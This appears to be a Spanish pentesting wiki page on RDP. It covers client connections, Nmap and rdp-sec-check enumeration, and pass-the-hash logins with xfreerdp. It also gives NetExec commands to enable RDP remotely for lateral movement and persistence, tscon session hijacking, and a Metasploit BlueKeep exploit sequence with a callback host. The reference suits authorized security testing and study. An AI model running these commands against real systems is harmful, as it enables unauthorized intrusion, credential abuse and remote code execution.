RDP - 3389/TCP

Puerto/s

3389

Protocolo/s

TCP

Conexión remota a servicios RDP

Windows

mstsc

https://learn.microsoft.com/es-es/windows-server/administration/windows-commands/mstsc

IP='192.168.1.100'
PORT='3389'
mstsc /v:$IP:$PORT

Linux

rdesktop

Cliente RDP clásico para sistemas Linux.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
IP='192.168.1.100'

rdesktop -u $USER -p $PASS $IP
rdesktop -d $DOMAIN -u $USER -p $PASS $IP

xfreerdp

Cliente RDP moderno y versátil, soporta autenticación por contraseña o hash NTLM.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

xfreerdp /u:$DOMAIN\$USER /p:$PASS /v:$IP /cert:ignore
xfreerdp /u:$DOMAIN\$USER /pth:$HASH /v:$IP /cert:ignore +clipboard /dynamic-resolution

Remmina

Cliente gráfico multiplataforma.

sudo apt install remmina

CLI:

remmina -c rdp://$USER@$IP
remmina -c rdp://$DOMAIN\\$USER@$IP
remmina -c rdp://$USER:$PASS@$IP

GUI:

Enumeración

Nmap

Enumeración de versión, cifrado y detección de vulnerabilidades:

nmap -p 3389 -sV -oA nmap/rdp_service -iL scope/scope.txt

nmap -T4 -p 3389 --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -oA nmap/rdp_scripts -iL scope/scope.txt

rdp-sec-check

Herramienta en Perl para auditar la configuración de seguridad de RDP.

git clone "https://github.com/CiscoCXSecurity/rdp-sec-check.git"
IP='192.168.1.100'
./rdp-sec-check.pl $IP

./rdp-sec-check.pl --file scope.txt --timeout 15 --retries 3 --outfile rdpseccheck.log --verbose

[AD] Equipos dentro del grupo "Remote Desktop Users"

Enumeración de equipos que pertenecen al grupo de RDP.

Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

Técnicas

Habilitar servicio RDP remotamente

Mediante el módulo -M rdp de NetExec es posible habilitar el servicio RDP en un host Windows remoto utilizando credenciales válidas de un usuario con privilegios administrativos. Esto se realiza a través de SMB, modificando internamente el registro del sistema remoto.

Objetivo: Habilitar RDP para permitir el acceso remoto al escritorio del sistema comprometido, facilitando el movimiento lateral o la persistencia en entornos Windows.

Para ello:

  • Internamente, se modifican claves del registro para habilitar fDenyTSConnections y abrir el puerto 3389 si es necesario.

  • Requiere privilegios administrativos válidos sobre el host remoto.

  • No establece una sesión RDP, solo habilita el servicio.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

netexec smb $IP -u $USER -p $PASS -M rdp -o ACTION=enable
netexec smb $IP -u $DOMAIN\\$USER -p $PASS -M rdp -o ACTION=enable

Permite al atacante preparar el entorno para una conexión interactiva, facilita el movimiento lateral (usando herramientas como xfreerdp, rdesktop, rubeus o incluso RDP GUI), y puede establecer una puerta de entrada persistente si no se detecta y revierte.

Clasificación MITRE ATT&CK:

Nivel
Técnica
ID

Táctica

Lateral Movement / Persistence

Técnica

Remote Services: SMB/Windows Admin Shares

Subtécnica

Remote Services: Remote Desktop Protocol

Técnica relacionada

Modify Registry

Ataques

Secuestro de sesión RDP (tscon)

Requiere privilegios en el sistema remoto con sesión activa.

query user
tscon $ID /dest:$SESSIONNAME

Vulnerabilidades

Bluekeep - CVE-2019-0708

https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2019-0708

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS TARGET_IP
set LHOST YOUR_IP
exploit

Referencias

Última actualización

¿Te fue útil?